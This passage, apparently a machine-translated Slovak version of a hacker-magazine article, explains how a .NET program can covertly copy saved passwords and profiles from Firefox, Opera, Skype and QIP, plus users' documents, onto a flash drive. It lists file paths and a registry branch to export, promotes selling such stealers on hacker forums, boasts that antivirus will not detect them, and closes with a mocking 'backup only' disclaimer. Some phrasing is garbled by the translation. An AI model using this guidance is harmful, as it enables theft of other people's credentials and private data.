Všetky tieto súbory sa nachádzajú v známom Document and Settings\%UserName%\Application Data\Mozilla\FireFox\Profiles\%ProfileName% .
Opera
Opera- prehliadač, ktorý je veľmi populárny medzi ruskými používateľmi. Samozrejme, nemôžeme to nechať bez dozoru. Takže s Operou je situácia približne rovnaká ako s FireFoxom. Všetky heslá uložené v prehliadači sú uložené v Document and Settings\%UserName%\Application Data\Opera\profile v súbore wand.dat. Ukazuje sa, že keď je zistená Opera, budeme konať rovnakým spôsobom ako v prípade firefox.
Skype
Popularita Skype rastie každým dňom. Mnoho ľudí to nepoužíva ako prostriedok na telefonovanie, ale na banálny pohodlný rozhovor. Všetky dôverné údaje sa podľa očakávania nachádzajú v používateľskom profile (na rovnakom mieste, kde ich ukladá Opera alebo FF). Ak ich chcete „sprivatizovať“, budete musieť skopírovať používateľský profil z Document and Settings\%userName%\Application Data\Skype\ a exportovať vetvu registra - HKEY_CURRENT_USER\Software\Skype\ProtectedStorage .
QIP
Ako väčšina programov opísaných vyššie, QIP ukladá všetky uložené heslá do Application Data\qip .
Kopírovanie dokončené
Technológia .NET výrazne zjednodušila našu úlohu, v dôsledku čoho sa celé kódovanie zredukovalo na volanie niekoľkých metód. Samozrejme, môžete povedať, že to nie je cool a že takéto veci je oveľa efektívnejšie písať vo WinAPI alebo ASM "e. V niektorých ohľadoch s vami súhlasím, ale majte na pamäti, na WinAPI a najmä na Asma , napíšte takýto program, ale neuspejete rýchlo. Zatiaľ čo iní píšu kilometrový kód, vy a ja budeme žať. Veľa šťastia v programovaní a ak máte nejaké otázky, napíšte do mydla.
Nezabudnite, že veľa používateľov ukladá dôverné informácie do priečinka „Moje dokumenty“. Minimálne môžu existovať zaujímavé pracovné dokumenty a niekedy aj celé súbory s heslami. Svojho času (v bývalej práci) som našiel na počítači účtovníčky pekne naformátovaný súbor s heslami pre klientov bánk.
Ako skutočný priateľ musíte pomôcť všetkým týmto ľuďom zálohovať ich citlivé informácie.
Mnoho fór hackerov má veľa reklám na predaj tohto druhu softvéru. Rôzne ceny - od 10 $ do 100 $. Po dokončení príkladov uvedených v článku si môžete zarobiť kôru čierneho chleba s kaviárom. Opakujem, hlavné je pristupovať k veci kreatívne a všetko sa určite podarí. Opäť to nezistia antivírusy;).
POZOR!
Tento program používame výhradne na včasné zálohovanie obsahu flash diskov na disk a zálohovanie hesiel na flash disk. A čo ste si mysleli? Nelegálne používanie takéhoto softvéru je trestné!